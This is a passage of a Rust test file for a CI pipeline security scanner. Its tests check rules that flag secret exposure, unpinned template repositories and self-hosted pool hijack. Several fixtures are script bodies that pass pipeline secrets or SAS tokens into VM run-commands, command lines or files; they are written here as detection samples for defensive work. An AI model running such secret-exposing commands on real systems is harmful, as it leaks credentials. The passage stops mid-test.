let external = g.add_node(
NodeKind::Image,
"org/repo/.github/workflows/deploy.yml@a5ac7e51b41094c92402da3b24376905380afc29",
TrustZone::ThirdParty,
);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
g.add_edge(step, external, EdgeKind::DelegatesTo);
let findings = cross_workflow_authority_chain(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].severity,
Severity::High,
"ThirdParty delegation target should be High (Critical reserved for Untrusted)"
);
assert_eq!(
findings[0].category,
FindingCategory::CrossWorkflowAuthorityChain
);
}
#[test]
fn self_mutating_pipeline_first_party_no_authority_is_medium() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
// FirstParty step writes the gate but holds no secret/identity access.
g.add_node_with_metadata(NodeKind::Step, "set-version", TrustZone::FirstParty, meta);
let findings = self_mutating_pipeline(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
}
#[test]
fn authority_cycle_3node_cycle_includes_all_members() {
// A → B → C → A should produce one finding whose nodes_involved
// contains all three node IDs, not just the back-edge endpoints.
let mut g = AuthorityGraph::new(source("test.yml"));
let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
g.add_edge(a, b, EdgeKind::DelegatesTo);
g.add_edge(b, c, EdgeKind::DelegatesTo);
g.add_edge(c, a, EdgeKind::DelegatesTo);
let findings = authority_cycle(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
assert!(
findings[0].nodes_involved.contains(&a),
"A must be in nodes_involved"
);
assert!(
findings[0].nodes_involved.contains(&b),
"B must be in nodes_involved — middle of A→B→C→A cycle"
);
assert!(
findings[0].nodes_involved.contains(&c),
"C must be in nodes_involved"
);
}
#[test]
fn variable_group_in_pr_job_fires_on_pr_trigger_with_var_group() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.metadata.insert(META_TRIGGER.into(), "pr".into());
let mut secret_meta = std::collections::HashMap::new();
secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
let secret = g.add_node_with_metadata(
NodeKind::Secret,
"prod-deploy-secrets",
TrustZone::FirstParty,
secret_meta,
);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = variable_group_in_pr_job(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
assert_eq!(findings[0].category, FindingCategory::VariableGroupInPrJob);
assert!(findings[0].message.contains("prod-deploy-secrets"));
}
#[test]
fn variable_group_in_pr_job_no_fire_without_pr_trigger() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
// No trigger metadata — should not fire
let mut secret_meta = std::collections::HashMap::new();
secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
let secret = g.add_node_with_metadata(
NodeKind::Secret,
"prod-deploy-secrets",
TrustZone::FirstParty,
secret_meta,
);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = variable_group_in_pr_job(&g);
assert!(
findings.is_empty(),
"no PR trigger → variable_group_in_pr_job must not fire"
);
}
#[test]
fn self_hosted_pool_pr_hijack_fires_when_all_three_factors_present() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.metadata.insert(META_TRIGGER.into(), "pr".into());
let mut pool_meta = std::collections::HashMap::new();
pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
g.add_node_with_metadata(
NodeKind::Image,
"self-hosted-pool",
TrustZone::FirstParty,
pool_meta,
);
let mut step_meta = std::collections::HashMap::new();
step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
let findings = self_hosted_pool_pr_hijack(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
assert_eq!(
findings[0].category,
FindingCategory::SelfHostedPoolPrHijack
);
assert!(findings[0].message.contains("self-hosted"));
}
#[test]
fn self_hosted_pool_pr_hijack_no_fire_without_pr_trigger() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
// No trigger metadata
let mut pool_meta = std::collections::HashMap::new();
pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
g.add_node_with_metadata(
NodeKind::Image,
"self-hosted-pool",
TrustZone::FirstParty,
pool_meta,
);
let mut step_meta = std::collections::HashMap::new();
step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
let findings = self_hosted_pool_pr_hijack(&g);
assert!(
findings.is_empty(),
"no PR trigger → self_hosted_pool_pr_hijack must not fire"
);
}
#[test]
fn service_connection_scope_mismatch_fires_on_pr_broad_non_oidc() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.metadata.insert(META_TRIGGER.into(), "pr".into());
let mut sc_meta = std::collections::HashMap::new();
sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
// No META_OIDC → treated as not OIDC-federated
let sc = g.add_node_with_metadata(
NodeKind::Identity,
"prod-azure-sc",
TrustZone::FirstParty,
sc_meta,
);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
g.add_edge(step, sc, EdgeKind::HasAccessTo);
let findings = service_connection_scope_mismatch(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert_eq!(
findings[0].category,
FindingCategory::ServiceConnectionScopeMismatch
);
assert!(findings[0].message.contains("prod-azure-sc"));
}
#[test]
fn service_connection_scope_mismatch_no_fire_without_pr_trigger() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
// No trigger metadata
let mut sc_meta = std::collections::HashMap::new();
sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
let sc = g.add_node_with_metadata(
NodeKind::Identity,
"prod-azure-sc",
TrustZone::FirstParty,
sc_meta,
);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
g.add_edge(step, sc, EdgeKind::HasAccessTo);
let findings = service_connection_scope_mismatch(&g);
assert!(
findings.is_empty(),
"no PR trigger → service_connection_scope_mismatch must not fire"
);
}
#[test]
fn checkout_self_pr_exposure_fires_on_pr_trigger() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.metadata.insert(META_TRIGGER.into(), "pr".into());
let mut step_meta = std::collections::HashMap::new();
step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
let findings = checkout_self_pr_exposure(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].category,
FindingCategory::CheckoutSelfPrExposure
);
assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn checkout_self_pr_exposure_no_fire_without_pr_trigger() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
// No META_TRIGGER set
let mut step_meta = std::collections::HashMap::new();
step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
let findings = checkout_self_pr_exposure(&g);
assert!(
findings.is_empty(),
"no PR trigger → checkout_self_pr_exposure must not fire"
);
}
#[test]
fn variable_group_in_pr_job_uses_cellos_remediation() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.metadata.insert(META_TRIGGER.into(), "pr".into());
let mut secret_meta = std::collections::HashMap::new();
secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
let secret = g.add_node_with_metadata(
NodeKind::Secret,
"prod-secret",
TrustZone::FirstParty,
secret_meta,
);
let step = g.add_node(NodeKind::Step, "deploy step", TrustZone::Untrusted);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = variable_group_in_pr_job(&g);
assert!(!findings.is_empty());
assert!(
matches!(
findings[0].recommendation,
Recommendation::CellosRemediation { .. }
),
"variable_group_in_pr_job must recommend CellosRemediation"
);
}
#[test]
fn service_connection_scope_mismatch_uses_cellos_remediation() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.metadata.insert(META_TRIGGER.into(), "pr".into());
let mut id_meta = std::collections::HashMap::new();
id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
id_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
// No META_OIDC → treated as not OIDC-federated
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"sub-conn",
TrustZone::FirstParty,
id_meta,
);
let step = g.add_node(NodeKind::Step, "azure deploy", TrustZone::Untrusted);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = service_connection_scope_mismatch(&g);
assert!(!findings.is_empty());
assert!(
matches!(
findings[0].recommendation,
Recommendation::CellosRemediation { .. }
),
"service_connection_scope_mismatch must recommend CellosRemediation"
);
}
/// Build a propagation graph with an optional approval-gated middle step:
/// Secret → middle Step (FirstParty) → Artifact → ThirdParty Step.
/// When `gated` is true the middle step carries META_ENV_APPROVAL.
fn build_env_approval_graph(gated: bool) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
let mut middle_meta = std::collections::HashMap::new();
if gated {
middle_meta.insert(META_ENV_APPROVAL.into(), "true".into());
}
let middle = g.add_node_with_metadata(
NodeKind::Step,
"deploy-prod",
TrustZone::FirstParty,
middle_meta,
);
let artifact = g.add_node(NodeKind::Artifact, "release.tar", TrustZone::FirstParty);
let third = g.add_node(
NodeKind::Step,
"third-party/uploader",
TrustZone::ThirdParty,
);
g.add_edge(middle, secret, EdgeKind::HasAccessTo);
g.add_edge(middle, artifact, EdgeKind::Produces);
g.add_edge(artifact, third, EdgeKind::Consumes);
g
}
#[test]
fn env_approval_gate_reduces_propagation_severity() {
// Baseline: no gate → Critical (third-party sink, not SHA-pinned)
let baseline = authority_propagation(&build_env_approval_graph(false), 4);
let baseline_finding = baseline
.iter()
.find(|f| f.category == FindingCategory::AuthorityPropagation)
.expect("baseline must produce an AuthorityPropagation finding");
assert_eq!(baseline_finding.severity, Severity::Critical);
assert!(!baseline_finding
.message
.contains("environment approval gate"));
// Gated: same shape, middle step tagged → severity drops one step to High
let gated = authority_propagation(&build_env_approval_graph(true), 4);
let gated_finding = gated
.iter()
.find(|f| f.category == FindingCategory::AuthorityPropagation)
.expect("gated must produce an AuthorityPropagation finding");
assert_eq!(
gated_finding.severity,
Severity::High,
"Critical must downgrade to High when path crosses an env-approval gate"
);
assert!(
gated_finding
.message
.contains("(mitigated: environment approval gate)"),
"gated finding must annotate the mitigation in its message"
);
}
#[test]
fn downgrade_one_step_table() {
assert_eq!(downgrade_one_step(Severity::Critical), Severity::High);
assert_eq!(downgrade_one_step(Severity::High), Severity::Medium);
assert_eq!(downgrade_one_step(Severity::Medium), Severity::Low);
assert_eq!(downgrade_one_step(Severity::Low), Severity::Low);
assert_eq!(downgrade_one_step(Severity::Info), Severity::Info);
}
// ── template_extends_unpinned_branch ──────────────────────
/// Build a graph whose META_REPOSITORIES carries a single repo descriptor.
/// `git_ref` of `None` encodes the "no `ref:` field" case (default branch).
fn graph_with_repo(
alias: &str,
repo_type: &str,
name: &str,
git_ref: Option<&str>,
used: bool,
) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
let mut obj = serde_json::Map::new();
obj.insert("alias".into(), serde_json::Value::String(alias.into()));
obj.insert(
"repo_type".into(),
serde_json::Value::String(repo_type.into()),
);
obj.insert("name".into(), serde_json::Value::String(name.into()));
if let Some(r) = git_ref {
obj.insert("ref".into(), serde_json::Value::String(r.into()));
}
obj.insert("used".into(), serde_json::Value::Bool(used));
let arr = serde_json::Value::Array(vec![serde_json::Value::Object(obj)]);
g.metadata.insert(
META_REPOSITORIES.into(),
serde_json::to_string(&arr).unwrap(),
);
g
}
// ── vm_remote_exec_via_pipeline_secret ──────────────
/// Helper: build a graph with one Step that has the given inline script
/// body and (optionally) a HasAccessTo edge to a Secret named `sas_var`.
fn graph_with_script_step(body: &str, secret_name: Option<&str>) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("ado.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_SCRIPT_BODY.into(), body.into());
let step_id =
g.add_node_with_metadata(NodeKind::Step, "deploy-vm", TrustZone::FirstParty, meta);
if let Some(name) = secret_name {
let sec = g.add_node(NodeKind::Secret, name, TrustZone::FirstParty);
g.add_edge(step_id, sec, EdgeKind::HasAccessTo);
}
g
}
// ── secret_to_inline_script_env_export ────────────────────
/// Build a graph with one Step that has access to `secret_name` and
/// stamps `script` as the META_SCRIPT_BODY.
fn build_step_with_script(secret_name: &str, script: &str) -> AuthorityGraph {
let mut g = AuthorityGraph::new(source("ado.yml"));
let secret = g.add_node(NodeKind::Secret, secret_name, TrustZone::FirstParty);
let mut meta = std::collections::HashMap::new();
meta.insert(META_SCRIPT_BODY.into(), script.into());
let step = g.add_node_with_metadata(NodeKind::Step, "deploy", TrustZone::FirstParty, meta);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
g
}
#[test]
fn template_extends_unpinned_branch_fires_on_missing_ref() {
let g = graph_with_repo(
"template-library",
"git",
"Template Library/Library",
None,
true,
);
let findings = template_extends_unpinned_branch(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].category,
FindingCategory::TemplateExtendsUnpinnedBranch
);
assert_eq!(findings[0].severity, Severity::High);
assert!(findings[0].message.contains("default branch"));
}
#[test]
fn template_extends_unpinned_branch_fires_on_refs_heads_main() {
let g = graph_with_repo(
"templates",
"git",
"org/templates",
Some("refs/heads/main"),
true,
);
let findings = template_extends_unpinned_branch(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("mutable branch 'main'"));
}
#[test]
fn template_extends_unpinned_branch_skips_tag_pinned() {
let g = graph_with_repo(
"templates",
"github",
"org/templates",
Some("refs/tags/v1.0.0"),
true,
);
let findings = template_extends_unpinned_branch(&g);
assert!(
findings.is_empty(),
"refs/tags/v1.0.0 must be treated as pinned"
);
}
#[test]
fn template_extends_unpinned_branch_skips_sha_pinned() {
let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
assert_eq!(sha.len(), 40);
let g = graph_with_repo("templates", "git", "org/templates", Some(sha), true);
let findings = template_extends_unpinned_branch(&g);
assert!(
findings.is_empty(),
"40-char hex SHA must be treated as pinned"
);
}
#[test]
fn template_extends_unpinned_branch_skips_unreferenced_repo_with_no_ref() {
// Spec edge: "repo declared but not referenced anywhere → does not fire
// (no consumer = no risk)". Applies when the declaration carries no
// explicit `ref:` field — the entry is purely vestigial in that case.
let g = graph_with_repo(
"templates",
"git",
"org/templates",
None, // no explicit ref
false, // and no consumer
);
let findings = template_extends_unpinned_branch(&g);
assert!(
findings.is_empty(),
"repo declared with no ref and no consumer must not fire"
);
}
#[test]
fn template_extends_unpinned_branch_fires_on_explicit_branch_even_without_in_file_consumer() {
// An explicit `ref: refs/heads/<branch>` signals intent to consume —
// the consumer is typically inside an included template file outside
// the per-file scan boundary (mirrors the msigeurope corpus shape).
let g = graph_with_repo(
"adf_publish",
"git",
"org/finance-reporting",
Some("refs/heads/adf_publish"),
false, // no in-file consumer
);
let findings = template_extends_unpinned_branch(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("mutable branch 'adf_publish'"));
}
#[test]
fn template_extends_unpinned_branch_skips_when_metadata_absent() {
let g = AuthorityGraph::new(source("ci.yml"));
assert!(template_extends_unpinned_branch(&g).is_empty());
}
#[test]
fn template_extends_unpinned_branch_handles_bare_branch_name() {
// `ref: main` (no `refs/heads/` prefix) is a valid ADO shorthand for a branch.
let g = graph_with_repo(
"template-library",
"git",
"Template Library/Library",
Some("main"),
true,
);
let findings = template_extends_unpinned_branch(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("mutable branch 'main'"));
}
// ── template_repo_ref_is_feature_branch ───────────────────
#[test]
fn template_repo_ref_is_feature_branch_fires_on_bare_feature_branch() {
// Mirrors the corpus shape: `ref: feature/maps-network` (no
// `refs/heads/` prefix) on the Template Library checkout.
let g = graph_with_repo(
"templateLibRepo",
"git",
"Template Library/Template Library",
Some("feature/maps-network"),
true,
);
let findings = template_repo_ref_is_feature_branch(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].category,
FindingCategory::TemplateRepoRefIsFeatureBranch
);
assert_eq!(findings[0].severity, Severity::High);
assert!(findings[0].message.contains("feature/maps-network"));
assert!(findings[0].message.contains("feature-class"));
}
#[test]
fn template_repo_ref_is_feature_branch_fires_on_refs_heads_feature() {
// Same attack via the fully-qualified `refs/heads/feature/...` form.
let g = graph_with_repo(
"templates",
"git",
"org/templates",
Some("refs/heads/feature/wip"),
true,
);
let findings = template_repo_ref_is_feature_branch(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("feature/wip"));
}
#[test]
fn template_repo_ref_is_feature_branch_fires_on_develop_branch() {
// `develop` is not in the trunk set — it's a feature-class branch.
let g = graph_with_repo(
"templates",
"git",
"org/templates",
Some("refs/heads/develop"),
true,
);
let findings = template_repo_ref_is_feature_branch(&g);
assert_eq!(findings.len(), 1);
}
#[test]
fn template_repo_ref_is_feature_branch_skips_main_branch() {
// `template_extends_unpinned_branch` still fires on this — but the
// feature-branch refinement does not, because main is the trunk.
let g = graph_with_repo(
"templates",
"git",
"org/templates",
Some("refs/heads/main"),
true,
);
assert!(template_repo_ref_is_feature_branch(&g).is_empty());
// Sanity: the parent rule still fires on the same input.
assert_eq!(template_extends_unpinned_branch(&g).len(), 1);
}
#[test]
fn template_repo_ref_is_feature_branch_skips_master_release_hotfix() {
for ref_value in [
"master",
"refs/heads/master",
"release/v1.4",
"refs/heads/release/2026-q2",
"releases/2026-04",
"hotfix/CVE-2026-0001",
"refs/heads/hotfix/CVE-2026-0002",
] {
let g = graph_with_repo("t", "git", "org/t", Some(ref_value), true);
assert!(
template_repo_ref_is_feature_branch(&g).is_empty(),
"ref {ref_value:?} must not fire as feature-class"
);
}
}
#[test]
fn template_repo_ref_is_feature_branch_skips_pinned_refs() {
// SHA, tag, and refs/heads/<sha> are all pinned — the feature-branch
// rule must not fire on any of them, regardless of the alias name.
let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
for ref_value in [
sha.to_string(),
"refs/tags/v1.4.2".to_string(),
format!("refs/heads/{sha}"),
] {
let g = graph_with_repo("templates", "git", "org/t", Some(&ref_value), true);
assert!(
template_repo_ref_is_feature_branch(&g).is_empty(),
"pinned ref {ref_value:?} must not fire"
);
}
}
#[test]
fn template_repo_ref_is_feature_branch_skips_when_ref_absent() {
// The "no ref:" (default-branch) case is left to
// `template_extends_unpinned_branch`. The feature-branch rule only
// fires on explicit feature-class refs.
let g = graph_with_repo("templates", "git", "org/templates", None, true);
assert!(template_repo_ref_is_feature_branch(&g).is_empty());
}
#[test]
fn template_repo_ref_is_feature_branch_cofires_with_parent_rule() {
// Both rules should fire together on the corpus shape — the parent
// says "not pinned", the refinement says "and it's a feature branch".
let g = graph_with_repo(
"templateLibRepo",
"git",
"Template Library/Template Library",
Some("feature/maps-network"),
true,
);
let parent = template_extends_unpinned_branch(&g);
let refinement = template_repo_ref_is_feature_branch(&g);
assert_eq!(parent.len(), 1, "parent rule must still fire");
assert_eq!(refinement.len(), 1, "refinement must fire alongside");
assert_ne!(parent[0].category, refinement[0].category);
}
#[test]
fn is_feature_class_branch_classification() {
// Trunk-class — must return false.
for b in [
"main",
"MAIN",
"master",
"refs/heads/main",
"release/v1",
"release/",
"release",
"releases/2026",
"hotfix/x",
"hotfix",
"hotfixes/y",
" refs/heads/main ",
] {
assert!(!is_feature_class_branch(b), "{b:?} must be trunk");
}
// Feature-class — must return true.
for b in [
"feature/foo",
"topic/bar",
"dev/wip",
"wip/x",
"develop",
"users/alice/spike",
"personal-branch",
"refs/heads/feature/x",
"main-staging", // not exact main, prefix-only — feature-class
] {
assert!(is_feature_class_branch(b), "{b:?} must be feature-class");
}
// Empty / whitespace.
assert!(!is_feature_class_branch(""));
assert!(!is_feature_class_branch(" "));
}
#[test]
fn template_extends_unpinned_branch_skips_refs_heads_with_sha() {
// ADO accepts `ref: refs/heads/<sha>` to lock onto a commit on a branch.
// The trailing segment is what determines mutability.
let sha = "0123456789abcdef0123456789abcdef01234567";
let g = graph_with_repo(
"templates",
"git",
"org/templates",
Some(&format!("refs/heads/{sha}")),
true,
);
let findings = template_extends_unpinned_branch(&g);
assert!(findings.is_empty());
}
// ── vm_remote_exec_via_pipeline_secret ──────────────
#[test]
fn vm_remote_exec_fires_on_set_azvmextension_with_minted_sas() {
let body = r#"
$sastokenpackages = New-AzStorageContainerSASToken -Container $packagecontainer -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
Set-AzVMExtension -ResourceGroupName $vmRG -VMName $vm.name -Name 'customScript' `
-Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
-Settings @{ "commandToExecute" = "powershell -File install.ps1 -saskey `"$sastokenpackages`"" }
"#;
let g = graph_with_script_step(body, None);
let findings = vm_remote_exec_via_pipeline_secret(&g);
assert_eq!(findings.len(), 1, "should fire once");
assert_eq!(
findings[0].category,
FindingCategory::VmRemoteExecViaPipelineSecret
);
assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn vm_remote_exec_fires_on_invoke_azvmruncommand_with_pipeline_secret() {
let body = r#"
Invoke-AzVMRunCommand -ResourceGroupName rg -VMName vm `
-CommandId RunPowerShellScript -ScriptString "Add-LocalGroupMember -Member admin -Password $(DOMAIN_JOIN_PASSWORD)"
"#;
let g = graph_with_script_step(body, Some("DOMAIN_JOIN_PASSWORD"));
let findings = vm_remote_exec_via_pipeline_secret(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0]
.message
.contains("interpolating a pipeline secret"));
}
#[test]
fn vm_remote_exec_does_not_fire_without_remote_exec_call() {
// Has a SAS mint, but no VM remote-exec primitive — should not fire.
let body = r#"
$sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
Write-Host "sas length is $($sas.Length)"
"#;
let g = graph_with_script_step(body, None);
let findings = vm_remote_exec_via_pipeline_secret(&g);
assert!(findings.is_empty());
}
#[test]
fn vm_remote_exec_does_not_fire_when_remote_exec_has_no_secret_or_sas() {
// Set-AzVMExtension with a static command line, no SAS, no secret —
// should not fire (no exposed credential).
let body = r#"
Set-AzVMExtension -ResourceGroupName rg -VMName vm -Name diag `
-Publisher Microsoft.Azure.Diagnostics -ExtensionType IaaSDiagnostics `
-Settings @{ "xmlCfg" = "<wadcfg/>" }
"#;
let g = graph_with_script_step(body, None);
let findings = vm_remote_exec_via_pipeline_secret(&g);
assert!(
findings.is_empty(),
"no SAS-mint and no secret interpolation → no finding"
);
}
#[test]
fn vm_remote_exec_fires_on_az_cli_run_command() {
let body = r#"
az vm run-command invoke --resource-group rg --name vm `
--command-id RunShellScript --scripts "echo $(DB_PASSWORD) > /tmp/x"
"#;
let g = graph_with_script_step(body, Some("DB_PASSWORD"));
let findings = vm_remote_exec_via_pipeline_secret(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("az vm run-command"));
}
// ── short_lived_sas_in_command_line ─────────────────
#[test]
fn sas_in_cmdline_fires_on_minted_sas_interpolated_into_command_to_execute() {
let body = r#"
$sastokenpackages = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
$settings = @{ "commandToExecute" = "powershell install.ps1 -sas `"$sastokenpackages`"" }
"#;
let g = graph_with_script_step(body, None);
let findings = short_lived_sas_in_command_line(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].category,
FindingCategory::ShortLivedSasInCommandLine
);
assert_eq!(findings[0].severity, Severity::Medium);
assert!(findings[0].message.contains("sastokenpackages"));
}
#[test]
fn sas_in_cmdline_does_not_fire_when_sas_is_only_uploaded_to_blob() {
// SAS minted but never put on argv — only used to build a URL.
let body = r#"
$sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
$url = "https://acct.blob.core.windows.net/c/?" + $sas
Invoke-WebRequest -Uri $url -OutFile foo.zip
"#;
let g = graph_with_script_step(body, None);
let findings = short_lived_sas_in_command_line(&g);
assert!(findings.is_empty(), "no command-line sink → no finding");
}
#[test]
fn sas_in_cmdline_does_not_fire_without_sas_mint() {
let body = r#"
$settings = @{ "commandToExecute" = "powershell -File foo.ps1" }
"#;
let g = graph_with_script_step(body, None);
let findings = short_lived_sas_in_command_line(&g);
assert!(findings.is_empty());
}
#[test]
fn sas_in_cmdline_fires_on_az_cli_generate_sas_with_arguments() {
let body = r#"
sas=$(az storage container generate-sas --name c --account-name acct --permissions r --expiry 2099-01-01 -o tsv)
az vm extension set --vm-name vm --resource-group rg --name CustomScript --publisher Microsoft.Compute \
--settings "{ \"commandToExecute\": \"curl https://acct.blob.core.windows.net/c/foo?$sas\" }"
"#;
let g = graph_with_script_step(body, None);
let findings = short_lived_sas_in_command_line(&g);
// mint + sink in same script → fires (fallback evidence path).
assert_eq!(findings.len(), 1);
}
#[test]
fn co_fire_on_solarwinds_pattern() {
// Mirrors the corpus solarwinds shape: SAS minted, embedded in
// CustomScriptExtension commandToExecute. Both rules must fire.
let body = r#"
$sastokenpackages = New-AzStorageContainerSASToken -Container $pc -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
Set-AzVMExtension -ResourceGroupName $rg -VMName $vm `
-Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
-Settings @{ "commandToExecute" = "powershell -File install.ps1 -sas `"$sastokenpackages`"" }
"#;
let g = graph_with_script_step(body, None);
let r6 = vm_remote_exec_via_pipeline_secret(&g);
let r7 = short_lived_sas_in_command_line(&g);
assert_eq!(r6.len(), 1, "rule 6 must fire on solarwinds shape");
assert_eq!(r7.len(), 1, "rule 7 must fire on solarwinds shape");
}
#[test]
fn body_interpolates_var_does_not_match_prefix() {
// `$sas` should not match `$sastokenpackages`.
assert!(!body_interpolates_var(
"Write-Host $sastokenpackages",
"sas"
));
assert!(body_interpolates_var(
"Write-Host $sastokenpackages",
"sastokenpackages"
));
assert!(body_interpolates_var("echo $(SECRET)", "SECRET"));
}
#[test]
fn powershell_sas_assignments_extracts_var_names() {
let body = r#"
$a = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r
$b = Get-Date
$sasBlob = New-AzStorageBlobSASToken -Container c -Blob foo -Context $ctx -Permission r
"#;
let names = powershell_sas_assignments(body);
assert!(names.iter().any(|n| n.eq_ignore_ascii_case("a")));
assert!(names.iter().any(|n| n.eq_ignore_ascii_case("sasBlob")));
assert!(!names.iter().any(|n| n.eq_ignore_ascii_case("b")));
}
#[test]
fn bash_export_of_pipeline_secret_flagged() {
let g = build_step_with_script(
"TF_TOKEN",
"echo init\nexport TF_TOKEN_app_terraform_io=\"$(TF_TOKEN)\"\nterraform init",
);
let findings = secret_to_inline_script_env_export(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert!(findings[0].message.contains("$(TF_TOKEN)"));
}
#[test]
fn powershell_assignment_of_pipeline_secret_flagged() {
let g = build_step_with_script(
"AppContainerDBPassword",
"$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n$x = 1",
);
let findings = secret_to_inline_script_env_export(&g);
assert_eq!(findings.len(), 1);
assert!(findings[0].message.contains("$(AppContainerDBPassword)"));
}
#[test]
fn secret_passed_as_command_argument_not_flagged() {
// Secret used as a CLI argument, not assigned to a variable. This is
// covered by the separate META_CLI_FLAG_EXPOSED detection — env_export
// should NOT also fire here.
let g = build_step_with_script("TF_TOKEN", "terraform plan -var \"token=$(TF_TOKEN)\"");
let findings = secret_to_inline_script_env_export(&g);
assert!(
findings.is_empty(),
"command-arg use of $(SECRET) must not trip env-export rule"
);
}
#[test]
fn step_without_script_body_not_flagged() {
let mut g = AuthorityGraph::new(source("ado.yml"));
let secret = g.add_node(NodeKind::Secret, "TF_TOKEN", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "task", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = secret_to_inline_script_env_export(&g);
assert!(findings.is_empty());
}
// ── secret_materialised_to_workspace_file ────────────────
#[test]
fn powershell_outfile_of_secret_to_workspace_flagged() {
// Mirrors Azure_Landing_Zone/userapp-n8nx pattern: secret bound to
// $var, then $var written via Out-File to $(System.DefaultWorkingDirectory).
let script = "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n\
$TFfile = Get-Content $(System.DefaultWorkingDirectory)/in.tfvars\n\
$TFfile = $TFfile.Replace(\"x\", $AppContainerDBPassword)\n\
$TFfile | Out-File $(System.DefaultWorkingDirectory)/envVars/tffile.tfvars";
let g = build_step_with_script("AppContainerDBPassword", script);
let findings = secret_materialised_to_workspace_file(&g);
assert_eq!(
findings.len(),
1,
"Out-File of bound secret to workspace must fire"
);
assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn bash_redirect_of_secret_to_tfvars_flagged() {
let script =
